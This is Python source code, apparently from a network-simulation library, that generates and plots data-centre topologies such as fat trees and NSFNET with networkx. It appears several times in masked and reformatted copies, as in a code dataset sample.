labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
        font_size (int,float): Size of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
        matplotlib.figure.Figure: figure of the plotted network.
"""
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15 * fig_scale, 15 * fig_scale])
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph[
'node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']
)
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network, pos, nodelist=network_nodes_dict[
node_type], node_size=network_node_size, node_color=next(
node_colours), linewidths=linewidths, label=node_type)
if draw_node_labels:
nx.draw_networkx_labels(network, pos, font_size=font_size,
font_color='k', font_family='sans-serif', font_weight='normal',
alpha=1.0)
fibre_links = list(network.edges)
nx.draw_networkx_edges(network, pos, edgelist=fibre_links, edge_color=
'k', width=3, label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
<mask token>
| <mask token>
from trafpy.generator.src import tools
import copy
import networkx as nx
import matplotlib.pyplot as plt
import json
def gen_arbitrary_network(num_eps, ep_label=None, ep_capacity=12500,
num_channels=1, racks_dict=None, topology_type=None):
"""Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
    indexing purposes when using the Demand class. This is useful where you
    want to use the Demand class but not necessarily with a carefully crafted
    networkx graph that accurately mimics the network you will use for the
    demands.
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
ep_capacity (int, float): Byte capacity per end point channel.
num_channels (int, float): Number of channels on each link in network.
racks_dict (dict): Mapping of which end points are in which racks. Keys are
            rack ids, values are list of end points. If None, assume there is
            no clustering/rack system grouping different end points into
            different clusters/racks.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
servers = [str(i) for i in range(num_eps)]
else:
servers = [(ep_label + '_' + str(i)) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),
servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
eps.append(node)
network.graph['endpoints'] = eps
max_nw_capacity = num_eps * ep_capacity * num_channels / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(
num_eps, ep_capacity, num_channels)
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=ep_capacity * num_channels, endpoint_label=
ep_label, node_labels=[ep_label], racks_dict=racks_dict,
topology_type=topology_type)
return network
def gen_nsfnet_network(ep_label='server', rack_label='rack', N=0,
num_channels=2, server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10, show_fig=False):
"""Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0, 1], [0, 3], [0, 2], [1, 2], [1, 7], [3, 8], [3, 4
], [3, 6], [4, 5], [4, 5], [5, 2], [5, 13], [5, 12], [6, 7], [7, 10
], [8, 11], [8, 9], [9, 10], [9, 12], [10, 11], [10, 13], [11, 12]]
if N == 0:
label = ep_label
else:
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
racks_dict = None
else:
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label + '_' + str(i))
network.add_edge(ep_label + '_' + str(i), rack_label + '_' +
str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
rack_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * rack_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet', racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
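# --- Illustrative sketch, not part of the original module ---
# With N > 0 each of the 14 NSFNET nodes becomes a ToR switch with N servers
# hung off it, and rack_to_ep_dict records the grouping:
def _example_nsfnet_racked():
    net = gen_nsfnet_network(N=2)
    assert len(net.graph['endpoints']) == 28  # 14 racks * 2 servers
    assert net.graph['rack_to_ep_dict']['0'] == ['server_0', 'server_1']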
def gen_simple_network(ep_label='server', num_channels=2,
server_to_rack_channel_capacity=500, show_fig=False):
"""Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
        server_to_rack_channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0, 1), (0, 2), (1, 2), (2, 4), (4, 3), (3, 1)],
weight=1)
servers = [(ep_label + '_' + str(i)) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5), servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
server_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * server_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label], topology_type=
'5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
"""Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
"""
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4, L=2, n=4, ep_label='server', rack_label='rack',
edge_label='edge', aggregate_label='agg', core_label='core',
num_channels=2, server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000, edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000, rack_to_core_channel_capacity=2000,
show_fig=False):
"""Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
        n (int): Number of servers per rack.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
edge_label (str,int): Label to assign to edge switch nodes
        aggregate_label (str,int): Label to assign to aggregate switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
        server_to_rack_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
"""
if L != 2 and L != 4:
raise Exception(
'L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'
.format(L))
if k % 2 != 0:
raise Exception(
'k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'
.format(k))
channel_names = gen_channel_names(num_channels)
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label,
core_label]
num_cores = int((k / 2) ** (L / 2))
num_aggs = int(k ** 2 / 2)
num_edges = int(k ** 2 / 2)
num_pods = int(2 * (k / 2) ** (L - 2))
num_racks = int(2 * (k / 2) ** (L - 1))
num_servers = int(num_racks * n)
cores = [(core_label + '_' + str(i)) for i in range(num_cores)]
aggs = [(aggregate_label + '_' + str(i)) for i in range(num_aggs)]
edges = [(edge_label + '_' + str(i)) for i in range(num_edges)]
racks = [(rack_label + '_' + str(i)) for i in range(num_racks)]
servers = [(ep_label + '_' + str(i)) for i in range(num_servers)]
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
for up_port in range(int(k / 2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network, (rack, core),
channel_names, rack_to_core_channel_capacity)
else:
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + k / 2)
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
pod_labels = [('pod_' + str(i)) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = 'pod_' + str(pod_iter),
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key], (pod_agg,
pod_edge), channel_names, edge_to_agg_channel_capacity)
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[
pod_iter])
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network, (core,
pod_agg), channel_names, agg_to_core_channel_capacity)
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network, (pod_edge,
rack), channel_names, rack_to_edge_channel_capacity)
racks_dict = {rack: [] for rack in racks}
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network, (rack, server),
channel_names, server_to_rack_channel_capacity)
racks_dict[rack].append(server)
max_nw_capacity = (num_servers * num_channels *
server_to_rack_channel_capacity / 2)
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network, max_nw_capacity,
num_channels, ep_link_capacity=server_to_rack_channel_capacity *
num_channels, endpoint_label=ep_label, node_labels=node_labels,
topology_type='fat_tree', racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
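# --- Illustrative sketch, not part of the original module ---
# The 4-layer variant with k=4 gives (k/2)^(L/2) = 4 cores, k = 4 pods each
# holding k/2 = 2 edge and 2 agg switches, and 2*(k/2)^(L-1) = 16 racks:
def _example_fat_tree_l4():
    net = gen_fat_tree(k=4, L=4, n=1)
    assert len(net.graph['endpoints']) == 16  # 16 racks * 1 server
    node_types = get_node_type_dict(net, net.graph['node_labels'])
    assert len(node_types['core']) == 4
    assert len(node_types['agg']) == 8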
def init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity, endpoint_label='server', topology_type='unknown',
node_labels=['server'], racks_dict=None):
"""Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
            assume there is no rack system grouping multiple servers into
            one rack.
"""
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
def gen_channel_names(num_channels):
"""Generates channel names for channels on each link in network."""
channels = [(channel + 1) for channel in range(num_channels)]
channel_names = [('channel_' + str(channel)) for channel in channels]
return channel_names
def add_edge_capacity_attrs(network, edge, channel_names, channel_capacity,
bidirectional_links=True):
"""Adds channels and corresponding max channel bytes to single edge in network.
Args:
        network (networkx graph): Network containing edges to which attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}}}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network, edges, channel_names,
channel_capacity, bidirectional_links=True):
"""Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
    or network[0][1]['1_to_0_port']['channels']['channel_1'] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}} for edge in edges}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity} for
edge in edges}
nx.set_edge_attributes(network, attrs)
def get_node_type_dict(network, node_types=[]):
"""Gets dict where keys are node types, values are list of nodes for each node type in graph."""
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
pass
return network_nodes_dict
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
"""Gets networkx positions of nodes in fat tree network for plotting."""
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {}
widths = {}
h = iter([1, 2, 3, 4, 5])
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1 / (len(node_type_dict[node_type]) + 1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = (idx + 1) * widths[node_type] * width_scale, heights[
node_type] * height_scale
idx += 1
return pos
def init_network_node_positions(net):
"""Initialises network node positions for plotting."""
if net.graph['topology_type'] == 'fat_tree':
pos = get_fat_tree_positions(net)
else:
pos = nx.nx_agraph.graphviz_layout(net, prog='neato')
return pos
def plot_network(network, draw_node_labels=True, ep_label='server',
network_node_size=2000, font_size=30, linewidths=1, fig_scale=2,
path_to_save=None, show_fig=False):
"""Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
        font_size (int,float): Size of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
        matplotlib.figure.Figure: figure of the plotted network.
"""
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15 * fig_scale, 15 * fig_scale])
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph[
'node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']
)
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network, pos, nodelist=network_nodes_dict[
node_type], node_size=network_node_size, node_color=next(
node_colours), linewidths=linewidths, label=node_type)
if draw_node_labels:
nx.draw_networkx_labels(network, pos, font_size=font_size,
font_color='k', font_family='sans-serif', font_weight='normal',
alpha=1.0)
fibre_links = list(network.edges)
nx.draw_networkx_edges(network, pos, edgelist=fibre_links, edge_color=
'k', width=3, label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
if __name__ == '__main__':
    # N.B. k must be even; plot_network has no name/with_labels kwargs, so
    # save via path_to_save (which pickles the figure) instead.
    network = gen_fat_tree(k=4)
    plot_network(network, draw_node_labels=True, path_to_save=
        'figures/graph/network_graph', show_fig=True)
| '''Module for generating and plotting networks.'''
from trafpy.generator.src import tools
import copy
import networkx as nx
import matplotlib.pyplot as plt
import json
def gen_arbitrary_network(num_eps,
ep_label=None,
ep_capacity=12500,
num_channels=1,
racks_dict=None,
topology_type=None):
'''Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
    indexing purposes when using the Demand class. This is useful where you
    want to use the Demand class but not necessarily with a carefully crafted
    networkx graph that accurately mimics the network you will use for the
    demands.
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
ep_capacity (int, float): Byte capacity per end point channel.
num_channels (int, float): Number of channels on each link in network.
racks_dict (dict): Mapping of which end points are in which racks. Keys are
            rack ids, values are list of end points. If None, assume there is
            no clustering/rack system grouping different end points into
            different clusters/racks.
Returns:
networkx graph: network object
'''
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
        # labels must be str, else not json serialisable
servers = [str(i) for i in range(num_eps)]
else:
servers = [ep_label+'_'+str(i) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
# ep_label is None
eps.append(node)
network.graph['endpoints'] = eps
# /= 2 to get max theoretical capacity (number of units which network can transfer per unit time)
max_nw_capacity = (num_eps * ep_capacity * num_channels) / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(num_eps, ep_capacity, num_channels)
init_global_network_attrs(network,
max_nw_capacity,
num_channels,
ep_link_capacity=ep_capacity*num_channels,
endpoint_label=ep_label,
node_labels=[ep_label],
racks_dict=racks_dict,
topology_type=topology_type)
return network
def gen_nsfnet_network(ep_label='server',
rack_label='rack',
N=0,
num_channels=2,
server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10,
show_fig=False):
'''Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
'''
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0,1],
[0,3],
[0,2],
[1,2],
[1,7],
[3,8],
[3,4],
[3,6],
[4,5],
                      [4,5], # duplicate of the previous pair; networkx ignores repeated edges
[5,2],
[5,13],
[5,12],
[6,7],
[7,10],
[8,11],
[8,9],
[9,10],
[9,12],
[10,11],
[10,13],
[11,12]]
if N == 0:
# above nodes are all end points
label = ep_label
else:
# above nodes are ToR switch nodes
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
# add 14 nodes
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
# assume all nodes are servers
racks_dict = None
else:
# each of 14 nodes in NSFNET is a ToR switch
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label+'_'+str(i))
network.add_edge(ep_label+'_'+str(i), rack_label+'_'+str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names, rack_to_rack_channel_capacity)
    # set global network attrs
network.graph['endpoints'] = get_endpoints(network, ep_label)
# /= 2 to get max theoretical capacity (number of units which network can transfer per unit time)
max_nw_capacity = (len(network.edges) * num_channels * rack_to_rack_channel_capacity) / 2
init_global_network_attrs(network,
max_nw_capacity,
num_channels,
ep_link_capacity=server_to_rack_channel_capacity*num_channels,
endpoint_label=ep_label,
node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet',
racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
def gen_simple_network(ep_label='server',
num_channels=2,
server_to_rack_channel_capacity=500,
show_fig=False):
'''Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
        server_to_rack_channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
'''
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0,1),
(0,2),
(1,2),
(2,4),
(4,3),
(3,1)],weight=1)
servers = [ep_label+'_'+str(i) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5),servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names, server_to_rack_channel_capacity)
    # set global network attrs
network.graph['endpoints'] = get_endpoints(network, ep_label)
# /= 2 to get max theoretical capacity (number of units which network can transfer per unit time)
max_nw_capacity = (len(network.edges) * num_channels * server_to_rack_channel_capacity) / 2
init_global_network_attrs(network,
max_nw_capacity,
num_channels,
ep_link_capacity=server_to_rack_channel_capacity*num_channels,
endpoint_label=ep_label,
node_labels=[ep_label],
topology_type='5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
'''Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
'''
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
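# --- Illustrative sketch, not part of the original module ---
# get_endpoints matches by substring, so the ep_label must not be a
# substring of any other node class; the gen_* functions here avoid such
# overlaps. A minimal check:
def _example_get_endpoints():
    import networkx as nx
    g = nx.Graph()
    g.add_nodes_from(['server_0', 'rack_0'])
    assert get_endpoints(g, 'server') == ['server_0']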
def gen_fat_tree(k=4,
L=2,
n=4,
ep_label='server',
rack_label='rack',
edge_label='edge',
aggregate_label='agg',
core_label='core',
num_channels = 2,
server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000,
edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000,
rack_to_core_channel_capacity=2000,
show_fig=False):
'''Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
        n (int): Number of servers per rack.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
edge_label (str,int): Label to assign to edge switch nodes
        aggregate_label (str,int): Label to assign to aggregate switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
        server_to_rack_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
'''
if L != 2 and L != 4:
